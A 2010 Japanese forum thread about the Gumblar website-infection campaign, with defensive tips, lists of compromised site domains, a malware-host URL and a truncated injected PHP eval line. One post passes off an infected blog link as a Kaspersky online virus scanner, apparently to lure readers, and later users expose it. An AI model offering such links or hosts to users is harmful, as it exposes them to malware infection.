サービス止めればOSに問題が起きるだろ。

404 :385:2010/05/06(木) 16:10:17
>Gumblar.x #
>Gumblar.xの改ざんコードは日本のIPアドレスからのアクセスを弾く!?

ttp://www●securelist●com/en/blog/2132/Gumblar_Farewell_Japan

↑これってGumblar.Xに関しては終息するってこと?

405 :名無しさん@お腹いっぱい。:2010/05/06(木) 16:45:49
希望的観測はしない方がいい

406 :名無しさん@お腹いっぱい。:2010/05/06(木) 17:00:33
だな
仮に今弾いてるとしても一時的なものと思ってた方がいい

407 :名無しさん@お腹いっぱい。:2010/05/06(木) 17:23:32
FFFTPなんて日本人しか使ってないようなソフトを狙ってるんだから
Gumblarの大元の作者は日本への攻撃を念頭に置いてるだろうしな

408 :名無しさん@お腹いっぱい。:2010/05/06(木) 17:29:59
日本の奴はアホみたいにかかるからな

409 :名無しさん@お腹いっぱい。:2010/05/06(木) 17:34:47
「るーたーがあるからだいじょうぶ」「さわぎすぎだろ」
老害の思考はこんなもんです
そして「自分だけは大丈夫」と思ってる奴がかかってサイト持ちがまたバラ撒く悪循環

410 :名無しさん@お腹いっぱい。:2010/05/06(木) 17:56:06
「自分だけは大丈夫」とか「ヘンなとこ見ないから俺には関係ない」とかホントにいるからなあ
そのくせ対策はセキュソフト任せでWindowsUpdateやってればマシな部類という…

411 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:03:12
OSアプデしててアンチウイルスきちんと使ってて、それ以上なにしろってんだ
PCにどこまでも人生の時間使ってられるかよ


412 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:10:45
>>411
本来それが理想なんだがな

413 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:29:43
クラウドコンピューティングが発達して行くと個人レベルではウイルス対策から開放される

これは間違いか?

414 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:31:29
評論家ごっこは他所でやれよ

415 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:31:50
ぺぺぺ^_^

416 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:32:08
pdfリーダーとflashplayerとjavaはアンインスコ推奨の方がいいと思う
今は大丈夫でも対策されるのは時間の問題だろうし
少なくとも、わざわざこんな板まで来るくらいに危機意識持ってるならアンインスコ必須かと

417 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:34:46
>>415
なんだあ、ぺぺぺって
わかりにくい反応すんなw

418 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:37:06
>>416
(  ゚,_ゝ゚)バカジャネーノ

419 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:38:44
>>416
JavaScriptも切っておけよ、極論厨

420 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:40:11
>>416
動画見れないとかなるとPC使う理由が半分はなくなる
エロだけのこと言ってんじゃないよ?
Flashplayer使えないとかネットしててもおもしろくないよ

421 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:40:15
>>419
それは普通に切るだろ

422 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:40:46
>>416
PDFリーダーとJavaはともかくFlash Playerアンインスコは非現実的でしょ

423 :名無しさん@お腹いっぱい。:2010/05/06(木) 18:52:29
ブラウザの中にはFlashplayerを簡単にその場その場でON/OFFできるものがある
そういうものを使えば両者対立せずに済む

終了

424 :名無しさん@お腹いっぱい。:2010/05/06(木) 19:44:09
>>423
で、OFFにしておいたまま放置してバージョンが古くなったFlashPlayerの
脆弱性をつつかれて感染ですね
わかります

425 :名無しさん@お腹いっぱい。:2010/05/06(木) 19:53:56
Gumblarかかる層なんて、そもそもブラウザIEしかしらないのがほとんどだし
ON/OFF切り替えなんて発想無いぞ?

426 :名無しさん@お腹いっぱい。:2010/05/06(木) 19:56:46
仮想環境にすればいい

427 :名無しさん@お腹いっぱい。:2010/05/06(木) 21:56:37
ブラウザをアンインストールすれば解決

428 :名無しさん@お腹いっぱい。:2010/05/06(木) 22:16:50
全人類が秘密を共有すれば解決

429 :名無しさん@お腹いっぱい。:2010/05/06(木) 22:43:21
Gumblarかかる層なんてOSはWindowsしかしらないし

430 :名無しさん@お腹いっぱい。:2010/05/06(木) 22:52:36
それ以前にガンブラーがどんなものか知らないに10モリタポ

431 :名無しさん@お腹いっぱい。:2010/05/06(木) 22:55:11
すげえ低レベルになったな

432 :名無しさん@お腹いっぱい。:2010/05/06(木) 23:00:09
へぇ
レベル高かったことって
あったっけ

433 :名無しさん@お腹いっぱい。:2010/05/06(木) 23:01:26
ガンブラーのAAが初めてはられたときのみレベルが高かった
それ以外は糞

434 :名無しさん@お腹いっぱい。:2010/05/06(木) 23:44:22
>>420
動画は落としてから見ればいいんじゃないか?

435 :名無しさん@お腹いっぱい。:2010/05/06(木) 23:44:26
ガンブラーとガンプラの違いがわからないに1狐ぽ

436 :名無しさん@お腹いっぱい。:2010/05/06(木) 23:59:40
違法な行為にならないか, よく調べて実行するように
ttp://www39.atwiki.jp/dl-ihou/pages/14.html

437 :名無しさん@お腹いっぱい。:2010/05/07(金) 00:31:55
Webブラウザ仮想化しておけば無問題じゃねーの
なんならOS毎仮想化しとけ

438 :名無しさん@お腹いっぱい。:2010/05/07(金) 01:25:58
Gumblarかかる層の人間の話してるのに、なんで仮想化なんてキーワードが出てくるんだろう
奴等にできるわけねーだろ

439 :名無しさん@お腹いっぱい。:2010/05/07(金) 02:50:45
荒れすぎワロタ

440 :名無しさん@お腹いっぱい。:2010/05/07(金) 13:13:31
www●ems-kankyo●co●jp

441 :名無しさん@お腹いっぱい。:2010/05/07(金) 13:29:45
てすt

442 :コテハン ◆8080adndqg :2010/05/07(金) 14:16:53
www●hd-cre●com/bj-fh ←なんだこれ?
newegg-com●paypal●com●renren-com●wayoutmall●ru:8080/・・・以下略
<?eval(base64_decode("Cm1i・・・
あふぃ・・・なのか?

443 :名無しさん@お腹いっぱい。:2010/05/07(金) 14:39:16
>>442
憶測は書くな。

444 :名無しさん@お腹いっぱい。:2010/05/07(金) 17:24:20
それはそうとflash playerは10.0.45.2からしばらく更新が無いね

445 :コテハン ◆8080adndqg :2010/05/07(金) 18:00:22
>>443 [・皿・;]
--
【陥落サイトのURL悪用厳禁】
blog●ceed●jp/ ←サイト内全滅w(.jsも)
myako●net/ ←中途半端な修正
※java2/imgkotei●js

www●hds-x●com/ ←Refresh

www●hds-x●com/top●html ←Gumblarがw
doujinnews●jp


446 :名無しさん@お腹いっぱい。:2010/05/07(金) 18:20:53
>>445
一番下のドメインがこわい

447 :名無しさん@お腹いっぱい。:2010/05/07(金) 18:21:23
気になるのだが
そのサイトのトップにはgumblerがあったとしても
そのサイトのトップ以外のページ(コラムとか他サイトへのリンクページとか)にはgumblerが無く
そこを見る分には大丈夫という場合はあるのか

まあ、>>2の対策をしていてもわざわざそんなページを見に行く物好きもそういないとおもうけど

448 :名無しさん@お腹いっぱい。:2010/05/07(金) 18:22:10
>>444
そろそろまた新しいゼロデイが発生する頃だよな…
来月か再来月くらいのWindowsUpdateの前後に更新されると予想

449 :名無しさん@お腹いっぱい。:2010/05/07(金) 18:23:10
>>447
あるけどいつ埋め込まれるかわからんしおすすめはしない

450 :名無しさん@お腹いっぱい。:2010/05/07(金) 18:36:05
doujinnewsのとこ一番下だけじゃなく一番上にもあるのか
初めて見たけどいままで気付かなかっただけかな

451 :名無しさん@お腹いっぱい。:2010/05/07(金) 18:57:55
adobeのセキュリティ意識の低さはもう完全に露呈されたんだから
flashplayerの代替品をMS辺りが用意してくれよ

452 :名無しさん@お腹いっぱい。:2010/05/07(金) 19:20:07
>>451
F-Secureブログで、F-Secureで開発するかもって言ってた

453 :名無しさん@お腹いっぱい。:2010/05/07(金) 19:20:48
>>451
つsilver light

454 :名無しさん@お腹いっぱい。:2010/05/07(金) 20:25:13
>>451
どう間違ったらそこでMSなんだよ

455 :名無しさん@お腹いっぱい。:2010/05/07(金) 20:57:52
>>453
silver lightは代替手段としてはありだと思うが
今の半分くらいまで負荷を下げてくれないと低スペPCがつらい
あとグラボの再生支援への対応

456 :名無しさん@お腹いっぱい。:2010/05/07(金) 21:02:25
×silver light
○Silverlight

457 :名無しさん@お腹いっぱい。:2010/05/07(金) 21:28:43
HTML5でいいじゃん

458 :名無しさん@お腹いっぱい。:2010/05/07(金) 21:38:23
現時点ではHTML5用のリッチコンテンツを簡単に作るようなツールがないからなあ…

459 :名無しさん@お腹いっぱい。:2010/05/07(金) 22:08:32
codec決まってないべ

460 :名無しさん@お腹いっぱい。:2010/05/07(金) 22:23:10
IE9ではH.264のみらしいけど

461 :コテハン ◆8080adndqg :2010/05/07(金) 23:37:20
doujinnews●jp 検索結果 約 7,730 件
www●google●co●jp/search?q=site%3Adoujinnews●jp&btnG=%E6%A4%9C%E7%B4%A2&hl=ja&lr=&sa=2
\(^o^)/オワタ

462 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:23:21
ガンブラー攻撃が常態化、トレンドマイクロ、4月のウイルス感染・報告ランキング(japan.internet.com)
http://headlines.yahoo.co.jp/hl?a=20100507-00000021-inet-secu

Yahooトップ

463 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:33:51
>>461
なんか気のせいか物凄まじくやばいような。

464 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:34:24
さっきMSEでTrojanDownloader:JS/Psyme.genが検出されたがGumblar?

465 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:34:37
俺もついに感染したようだ。このスレのアドレス開いてから
すぐにブルースクリーンになったりで調子が悪い

466 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:41:40
>>465
Kaspersky File Scanner オンラインウイルススキャン
http://blog.ceed.jp/?jp=kaspersky/filescanner/virusscanner

これで検出されなければ感染してないよ

467 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:48:06
>>465
Online Scanner
http://www.f-secure.com/en_MY/security/security-lab/tools-and-services/online-scanner/

468 :名無しさん@お腹いっぱい。:2010/05/08(土) 00:57:17
>>466-467
乙。

469 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:01:20
>>466-467ってKasperskyやF-secure以外のアンチウイルスソフト使っててもスキャン出来るの?

470 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:06:01
>>469
は?

471 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:08:24
>>470
あれ 競合しないのか

472 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:08:31
オンラインスキャンがなんたるかをよく理解してないらしい

473 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:08:37
>オンラインウイルススキャン
>Online Scanner

474 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:10:18
>>471
そんな認識だからPCウイルスに感染するんだぞ(笑)

475 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:12:23
>>465
このスレのアドレス?
このスレ開いたら感染するのか?

476 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:17:55
>>474
ホントにな…

477 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:25:00
>>464
トロイの木馬だけどGumblarでは無いな

478 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:25:45
>>475
うん

479 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:31:02
>>478
そんなこと全然ないけど?
live2chで見てるけど全然平気なんだけど
>>2の対策をしてるからかな?

480 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:33:50
>このスレのアドレス?
うん

>このスレ開いたら感染するのか?
うん

どっちやねん

481 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:36:51
>>479
信じるなよw

482 :名無しさん@お腹いっぱい。:2010/05/08(土) 01:53:25
PDFに埋め込まれた全プログラムを無効化できるようになった「Foxit Reader」v3.3
http://www.forest.impress.co.jp/docs/news/20100506_365660.html

これどうなんだろ?

483 :名無しさん@お腹いっぱい。:2010/05/08(土) 02:07:23
対策もしてないのにこのスレで挙げられてる陥落サイトのアドレスを
うっかり踏んじゃったってことじゃないか。

484 :名無しさん@お腹いっぱい。:2010/05/08(土) 02:27:36
>>466-476
競合もしないレベルで動くオンラインスキャン使ってスキャンして、
それで何もないからってどれ位の意味なの

485 :名無しさん@お腹いっぱい。:2010/05/08(土) 02:29:52
結局そのオンラインスキャンを実行してるのは、感染疑いのあるそのPC自体でしょ
すくなくともインストールして使うもの利用したほうがいいのかね

486 :名無しさん@お腹いっぱい。:2010/05/08(土) 03:12:02
doujinnewsのやつ
ttps://www.virustotal.com/jp/analisis/284bec4e580ab7b71f5385fd7c09aa3c9dfb65eb87fd4c49baba4e2b22eccabc-1273255752
結果: 1/41 (2.44%)
McAfee-GW-Edition:Heuristic.BehavesLike.HTML.Shellcode.K

487 :名無しさん@お腹いっぱい。:2010/05/08(土) 08:17:07
>>466のアドレスへ行ったのですが、
Kasperskyのオンラインスキャンがあるのかわかりません。
どなたか教えてください。よろしくお願いします。


488 :名無しさん@お腹いっぱい。:2010/05/08(土) 08:36:53
>>487
そこGumblarの可能性ありって出るよ

489 :名無しさん@お腹いっぱい。:2010/05/08(土) 09:09:12
www●spoffice●jp

株式会社セカンドプランニング この会社が関わっている
yamatwo●jp
www●sobank●jp
www●spoffice●jp
全てが改ざん

490 :名無しさん@お腹いっぱい。:2010/05/08(土) 09:23:25
>>488
そうですか・・・
教えてくださってありがとうございます。
一応>>2-3あたりの対策はしているのですが
クリーンインストールした方がいいですか?
何度もすいません。

491 :名無しさん@お腹いっぱい。:2010/05/08(土) 09:35:13
ネット上にあがってるWebサイトの改竄方法を教えてください
ウイルスを仕込むわけではなくバナーを消したり文章を変える程度です
Web改竄について詳しく書いてあるサイトを教えてくれる形でもいいです
お願いします

492 :名無しさん@お腹いっぱい。:2010/05/08(土) 09:40:27
スレチだゴミ

493 :名無しさん@お腹いっぱい。:2010/05/08(土) 09:57:54
最近嘘書いて改ざんサイトに誘導するバカが出没してるな
しかもそれに対して大体レスが付くことから自演を駆使してるようだ
どうせ>>465-471あたりは同一人物だろ
でもって>>490はキモイ流れになってる事とおかしなURLから危険を察しろ

494 :名無しさん@お腹いっぱい。:2010/05/08(土) 11:53:36
suncs●sakura●ne●jp
www●kfbclub●com

495 :名無しさん@お腹いっぱい。:2010/05/08(土) 12:06:55
>>490
URLがそのままなのはまあ黒だろ
迂闊に踏む前にちょっと流れ見るべきだね
どうせ誘導したいクソは自分が踏んで感染した腹いせなんだろうが
ひょいとのぞきに来たような人は無理に流れに参加しようとしなくていい

496 :名無しさん@お腹いっぱい。:2010/05/08(土) 12:47:39
>>493>>495
ご迷惑掛けてすいません。
クリーンインストールはいいのですが
残しておきたいデータなどがあるのでほんと落ち込んでます。
今は起動させてない外付けがあるのですが、
そちらに移すと外付けの方にもダメになりますか?
基本的なことかもしれませんがどうか教えてください。



497 :名無しさん@お腹いっぱい。:2010/05/08(土) 13:38:36
>>496
そんな大事なデータをバックアップとっていないのなら
今回は勉強として諦めた方がいいよ
悔しいのはわかるけどね

498 :名無しさん@お腹いっぱい。:2010/05/08(土) 13:39:35
>>496
ざまあああああ

499 :名無しさん@お腹いっぱい。:2010/05/08(土) 14:16:12
>>496 aguseで確認
dirtysin.ru:8080○google.com○kakaku.com○110mb.com○php

ご愁傷様・・・

500 :名無しさん@お腹いっぱい。:2010/05/08(土) 14:31:59
最近のGumblarはGENOみたいに動作が重くなるとか変なファイル作成はあるのかなあ

501 :名無しさん@お腹いっぱい。:2010/05/08(土) 14:44:03
>>2をしっかりやってても踏んだら感染するのか?・・

502 :名無しさん@お腹いっぱい。:2010/05/08(土) 15:03:13
MyJVNバージョンチェッカ IE8に対応すればいいのになあ

ttp://jvndb.jvn.jp/apis/myjvn/#VCCHECK

503 :名無しさん@お腹いっぱい。:2010/05/08(土) 15:21:11
Windows 7にも未対応だって笑わせるな

504 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:00:29
>>496
そんな大事なら他のメディアに移すことも考えてみたら
Gumblarの挙動の基本はサイトの管理者アカウントを盗むことらしいし
亜種だったら他のこともするらしいけど
このスレにそこらの書き込みあったと思うよ
一方でOSクリーンインストールする時には、HDD上にデータはすべて消してからのがいいんだろうね多分

505 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:01:49
107 :(VдV) ◆yUyb3Tqn92 :2010/05/08(土) 15:04:26 ID:f48FTMOs
>>97はここのコピペだぞw
http://blog.ceed.jp/

よくできておるのう ´,дゝ`)コピペにマジレス乙だお





↑を踏んでしまいました。
このコテが言うにはガンブラウィルスらしいのですが、釣りや脅しのような気がするので鑑定よろ

506 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:07:14
アドレス貼りのルールも守れない馬鹿にはいい気味だ

507 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:08:20
>>505
馬鹿か
すれ違いじゃ

508 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:09:11
>>506
馬鹿
所詮ローカルルールだと気づけ馬鹿

509 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:10:02
505 ざまぁwwww

510 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:10:04
sageろとかいう馬鹿と同じで
システム上できることは仕様だから仕方ないさ
よほどのことしないかぎりね。


511 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:11:06
マジレスすると(VдV)のコテ付けた奴はウィルス貼ってる常習犯なわけだが
今回ばかりは505みたいな阿呆にウィルスを踏ませた(VдV)をGJと言いたいwwwwwww

512 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:11:46
ガチでGumblarだしざまぁ
ttp://dirtysin●ru:8080/google●com/kakaku●com/110mb●com●php

513 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:14:02
>>512
>>5>>91のチェッカー全部スルーしてやがる


514 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:16:11
os:win7 64bit アップデート済み
northon2010 更新済み
adobe reader 最新ver

JREはup17だったと思われ。
この環境で上記URL踏んでしまったのだが
ノートン先生でフル検索かけてもウィルスが見つからない。
後外部から自分のPCに向けてポートスキャンかけてみたけど(LANで)、異常無し。

普段wimaxで接続してるからgkbrなんだが…さてはて

515 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:18:00
上記

516 :514:2010/05/08(土) 16:21:53
おいらが踏んだのはこれです。
ttp://blog○ceed○jp○?jp=kaspersky○filescanner○virusscanner

実はその前に
ttp://s02○megalodon.jp/2008-0922-1659-16/www○geocities○com/imomushi2005/imomushi20○htm
これを踏んで
Nine-Ball Mass Injectionがどうたらって警告が出たので
その対策を調べに来ていてやられました。マジ情けない…

517 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:26:01
>>516
お前>>505だろwwwwwwwwwwww
だからURL貼り忘れたんだべwwwwwww他いけよもうw

518 :491:2010/05/08(土) 16:28:33
>>492
スレチかもしれませんがここのスレの人が一番詳しそうなので>>491について教えてくださいお願いします


519 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:31:51
ママに聞けクソガキ

520 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:33:13
>>518
犯罪

521 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:41:42
>>518
ばーか

522 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:46:15
>>518
バカ

523 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:47:28
いろいろ、ヘンなのが沸いてきたね。
連休疲れ?

524 :名無しさん@お腹いっぱい。:2010/05/08(土) 16:54:24
>>518

                ハ        _
    ___         ‖ヾ     ハ
  /     ヽ      ‖::::|l    ‖:||.
 / 聞 え  |     ||:::::::||    ||:::||
 |  こ ?  |     |{:::::‖.  . .||:::||
 |  え      |     _」ゝ/'--―- 、|{::ノ!
 |  な 何   |  /   __      `'〈
 |  い ?   ! /´   /´ ●    __  ヽ
 ヽ      / /     ゝ....ノ   /´●   i
  ` ー―< {           ゝ- ′ |
        厶-―    r  l>        |
      ∠ヽ ゝ-―     `r-ト、_,)      |
      レ^ヾ ヽ>' ̄     LL/  、   /
      .l   ヾ:ヽ ` 、_      \\ '
     l    ヾ:ヽ   ト`ー-r-;;y‐T^
      |    ヾ `ニニ「〈〉フ /‖. j

525 :名無しさん@お腹いっぱい。:2010/05/08(土) 17:26:33
>>517
違うんじゃないか
urlが中途半端に違う
このスレで踏んだ奴だろ

>>505は、=>>508>>510

つーか規制食らったww

526 :コテハン ◆8080adndqg :2010/05/08(土) 18:49:58
>>501
最新版に更新済でも、JAVAの旧バージョンの残骸が残ってたりすると
やられてしまう可能性があるのです・・・

このスレの住人以外の方へ>
貼ってあるアヤシイURLは直接踏まず
【aguse Gateway】
http://gw.aguse.jp/
ここを使いましょう。

>aguse Gatewayとは?
スクリーンキャプチャを使った完全に安全なブラウザ型ゲートウェイです。
>サイトを1枚ずつキャプチャして見せ、ブラウザに準じた動作が可能です。


527 :名無しさん@お腹いっぱい。:2010/05/08(土) 18:57:29
感染確認方法がないのが怖い

528 :名無しさん@お腹いっぱい。:2010/05/08(土) 18:57:33
aguseは現状のGumblar検出用には当てにならん
あやしいhttp://www.example.com:8080/の:8080とかは検出してくれるけど
そこも注意深く見ないと安全なサイトにしか見えないし

529 :名無しさん@お腹いっぱい。:2010/05/08(土) 19:31:17
なんかFTPのパス抜かれるだけ、って結論に上の方でなってるけど、
確か最初はネトゲのパスが抜かれてたような記憶がある
去年の夏ごろの上に出てたAsian motorsのサイトだったような気が、、、

てか、感染サイトのお知らせ、アンチウイルスサイトのアドレス貼って、そこ行け、で済ませてる所多いけど、
感染してたらウイルス除去、だけじゃ済まんだろ。
FTP以外のパス変えたり、クレカ会社に連絡しなきゃ、たとえクリーンストールしても、
意味無いような気がする。

530 :名無しさん@お腹いっぱい。:2010/05/08(土) 19:49:03
三井住友VISAはあの程度で済ますとか被害わかってやってんのかな?
仮にもクレジットカード会社の取る行動じゃないよな

531 :名無しさん@お腹いっぱい。:2010/05/08(土) 20:56:50
>>512
VirusTotalだとどうなのだろう

532 :名無しさん@お腹いっぱい。:2010/05/08(土) 21:01:57
まあ心配ならゲーム機でネット見るとかすればいいんじゃね

533 :名無しさん@お腹いっぱい。:2010/05/08(土) 21:07:17
何だか>>504以降の書き込み時間が近接してるな

534 :名無しさん@お腹いっぱい。:2010/05/08(土) 21:11:34
>>518
それ改ざんとはいわないだろ
要するに広告ブロックとかしたいんじゃないの
あとはぐぐれ

535 :名無しさん@お腹いっぱい。:2010/05/08(土) 21:12:36
>>529
そんな結論にはなってないとおもうよ

536 :名無しさん@お腹いっぱい。:2010/05/08(土) 21:20:19
>>532
KNOPPIXをDVD起動で使用

537 :名無しさん@お腹いっぱい。:2010/05/08(土) 22:39:44
KNOPPIXをusb起動で使用

538 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:27:54
>>534
広告ブロックではなく文章や写真を少しだけ変えて知り合いを驚かせたいんです。
そのためには管理者側としてソースコードを書き換える必要があると思うのですが
難しいのでしょうか?
ちょっとした自己掲示欲でウイルスを入れようなどは考えていません。
ここにいる人は詳しいと思ったのでここで質問させていただきました。

539 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:29:33
本当の意味での改竄じゃん

540 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:32:42
それは犯罪w

541 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:35:05
>>538
失せろダニ

542 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:36:44
>>538
(  ゚,_ゝ゚)バカジャネーノ

543 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:41:14
自己掲示欲て

544 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:43:05
>>538
それは犯罪です

545 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:44:58
>>516
これってここに貼ってあったやつだけど改竄されてるか?
今見たけどカスペもシマンテックもアバストも特に反応しねーが

546 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:46:53
>>538
あまりにも幼稚な発想でこわいわ
お前がサイト持ってて突然改ざんされたら驚く程度では済まなくね?
恐怖感のほうが強いはず
ストーカーか何かなの?
軽いイタズラじゃ済まないよ

547 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:48:59
>>545
上はこっそり修正したのかもしれん
Date: Sat, 08 May 2010 14:47:09 GMT

たぶんそのうちまた再改ざんされるんじゃね

548 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:49:29
>>545
今は直ってるけど、少なくともhttp://blog●ceed●jp/は>>512が埋まってた

549 :名無しさん@お腹いっぱい。:2010/05/08(土) 23:58:07
>>547->>548
なるほど、サンクス
修正はされたけどアナウンスはされてないのねw

550 :名無しさん@お腹いっぱい。:2010/05/09(日) 00:14:37
>>548
そのURL踏むとPC動作重くなったり何かファイル組みこんだりする?

551 :名無しさん@お腹いっぱい。:2010/05/09(日) 01:40:48
>>550
過去に踏んでしまったのならそういうこともあるかもしれません

552 :名無しさん@お腹いっぱい。:2010/05/09(日) 02:08:06
>>538
てめー24しとくわ
せいぜい家でマッポがいつくるかガクブルして待ってろ

553 :名無しさん@お腹いっぱい。:2010/05/09(日) 02:08:16
>>549
>514です。aguseで昨日の12:00頃調べた時には,>>512が検出されました。
Norton Safe Webで調べてみたところ、以前同サーバの別ページ?で
Bloodhound.Exploit.292の存在が確認されている模様。
パスワードやクレジットカード情報などを盗むウィルスに分類されているようですが
windows7への感染は無いっぽい?よく分からん。

554 :名無しさん@お腹いっぱい。:2010/05/09(日) 13:22:54
こっそり修正が一番たちが悪い

IPAかJPCERTのGumblarにかかったらどうするかって所に
・公表する
・ホームページの管理者なら、いつからいつまでの間ウィルスが埋め込まれていたのか明らかにする
って内容があった気がする

>>516の上は最低だな

555 :名無しさん@お腹いっぱい。:2010/05/09(日) 13:48:15
ハニーホエール ってどう?

556 :名無しさん@お腹いっぱい。:2010/05/09(日) 15:00:07
こりか。
ttp://www.lac.co.jp/info/alert/ks_talk20100326.html

557 :名無しさん@お腹いっぱい。:2010/05/09(日) 15:50:45
>>554
まあそういうことをやるとこはポカするたびにこっそり書き換えとかやって段々信用を無くしてくよ
セキュリティ関係ないけどアクティスの電源とかな

558 :コテハン ◆8080adndqg :2010/05/09(日) 16:18:44
【陥落サイトのURL悪用厳禁】
slmo●co●jp/
www●hd-cre●com/ ←ここはやられてないけど・・・

www●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F&btnG=%E6%A4%9C%E7%B4%A2&lr=

559 :名無しさん@お腹いっぱい。:2010/05/09(日) 16:20:32
>>555
こりか。
ttp://samspade.org/whois/honeywhales.com

560 :名無しさん@お腹いっぱい。:2010/05/09(日) 16:36:48
>>555
>>556
>>559

これはおそらく自演
迂闊に踏むなよ

561 :名無しさん@お腹いっぱい。:2010/05/09(日) 16:51:54
このスレに住みついてる奴に知らないアドレスをホイホイと踏む馬鹿は居ないと思うが・・・
まぁ外部から興味本位で来て引っ掛かった奴は「ご愁傷さまだ、さっさとクリーンインストールして来い」で良いと思う

562 :名無しさん@お腹いっぱい。:2010/05/09(日) 17:08:55
普通のリンクじゃん
馬鹿じゃないの

563 :名無しさん@お腹いっぱい。:2010/05/09(日) 17:45:35
>>557
段々信用をなくすって言うけど元からないだろう。こういうとこは。

564 :名無しさん@お腹いっぱい。:2010/05/09(日) 17:51:24
>>561
ご愁傷さま

565 :名無しさん@お腹いっぱい。:2010/05/09(日) 20:42:15
>>560
アンカーつけると削除依頼が通らなくなるぞ

566 :名無しさん@お腹いっぱい。:2010/05/09(日) 21:50:14
もみじ 乙!

567 :名無しさん@お腹いっぱい。:2010/05/09(日) 22:42:05
>>565
アンカーつけるところまで自演じゃないの?

568 :名無しさん@お腹いっぱい。:2010/05/10(月) 00:32:44
www●historyasia●com/Scripts/AC_RunActiveContent●js
傑作な改竄修正。
管理人は一体何を考えているんだ…

569 :名無しさん@お腹いっぱい。:2010/05/10(月) 03:25:34
>>568
//12Apr2010 : Malware script

ところどころコメントアウトしてあったり、なかったりw

570 :名無しさん@お腹いっぱい。:2010/05/10(月) 03:42:17
まだあったのかこのスレ
久しぶりすぎる




571 :名無しさん@お腹いっぱい。:2010/05/10(月) 05:37:59
>>494
下 >ホームページに関するお詫びとお知らせ

572 :名無しさん@お腹いっぱい。:2010/05/10(月) 10:41:22
質問があるのですが
ruドメインとcnドメインのサイトは全て危険とみなしてよいのでしょうか?

573 :名無しさん@お腹いっぱい。:2010/05/10(月) 11:39:45
見なしてもいいけど、それが絶対じゃない

ブラジルとか最近spamの温床になってきてる新興国や発展途上国なんかは要注意だね

574 :名無しさん@お腹いっぱい。:2010/05/10(月) 12:56:05
.infoとかでも罠サイトがあったって話だし、ドメインだけじゃ判断できなくなってきてる
そのうちcomとかjpもできるんじゃないかね

575 :名無しさん@お腹いっぱい。:2010/05/10(月) 13:03:32
>>574
comは既にあるらしい

「.ru」ドメイン対策では防げない「Gumblar」攻撃 - マルウェア配布サイトに「.com」などが
http://www.security-next.com/012509.html

576 :名無しさん@お腹いっぱい。:2010/05/10(月) 13:57:51
新種
stompstamp●com

577 :名無しさん@お腹いっぱい。:2010/05/10(月) 15:19:55
>>572
全部危険ってわけじゃないだろ。
McAfeeは毎年危ないTLDを発表してるが、2009年は
cm(カメルーン)
com(gTLD)
cn(中国)
ws(サモア)
info(gTLD)
の順だった。
PDF www.mcafee.com/common/media/mcafeeb2b/international/japan/pdf/threatreport/2009_MTMW_Report.pdf
cnは昨年12月14日から、ruは4月1日から登録が面倒になった(書類審査)。
今後は他のが増えてくるんじゃね。

578 :名無しさん@お腹いっぱい。:2010/05/10(月) 17:15:58
ネット鎖国も防衛手段としては有効だぜ?

579 :名無しさん@お腹いっぱい。:2010/05/10(月) 17:29:13
http://www.k●naka.jp/fs/k●naka/Information.html
ちょっと確認してもらえないか

580 :名無しさん@お腹いっぱい。:2010/05/10(月) 17:30:33
>>579
ここはそういうスレじゃない

581 :名無しさん@お腹いっぱい。:2010/05/10(月) 18:01:05
>>579
bloodhound.exploit.292

>>580
死ね

>>553

582 :名無しさん@お腹いっぱい。:2010/05/10(月) 18:43:41
>>581
>>1も読まないやつに答えるなよ
